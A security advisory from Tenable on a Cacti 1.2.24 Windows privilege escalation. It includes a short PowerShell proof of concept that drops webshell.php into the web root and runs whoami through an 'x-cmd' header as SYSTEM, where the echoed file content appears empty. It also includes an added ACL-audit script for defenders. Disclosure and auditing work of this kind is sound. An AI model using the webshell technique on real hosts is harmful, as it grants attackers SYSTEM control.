Cacti Privilege Escalation
Oct. 18, 2023, 3:08 p.m. | Jimi Sebree
Tenable Research Advisories www.tenable.com
Cacti 1.2.24 and prior allows a low-privileged OS user with access to a Windows host where Cacti is installed to create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM.
Proof of Concept
// After login/RDP as user1
PS C:\Users\user1> echo '' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
PS C:\Users\user1>
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty Content
nt authority\system
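As an added defender-side check (not part of the Tenable advisory), the following PowerShell audits a Cacti web document directory tree for ACEs that grant write or modify rights to broad, low-privileged principals, which is the precondition for the file drop described above. The default path and the list of principals are assumptions to adjust for the host.

```powershell
# Added example, not code from the Tenable advisory. Audits a web document
# directory tree for broad principals holding write/modify rights.
# The default path and $BroadPrincipals are assumptions for illustration.
param(
    [string]$Path = 'C:\Apache24\htdocs\cacti'
)

# Principals that should never hold write rights on served web content.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets a user create or alter files in the directory.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::CreateFiles

# Walk the root plus every subdirectory so inherited and explicit ACEs are both seen.
$dirs = @(Get-Item -Path $Path) + @(Get-ChildItem -Path $Path -Recurse -Directory)
$findings = @()

foreach ($dir in $dirs) {
    $acl = Get-Acl -Path $dir.FullName
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        $findings += [pscustomobject]@{
            Directory = $dir.FullName
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No broad write ACEs found under $Path"
} else {
    # Each row is a directory where a low-privileged user could drop a file.
    # Remediate with e.g.: icacls <Directory> /remove:g "BUILTIN\Users"
    $findings | Format-Table -AutoSize
}
```

Run it from an elevated prompt so Get-Acl can read every subdirectory; an inherited finding usually points at the parent directory where the permissive ACE was actually set.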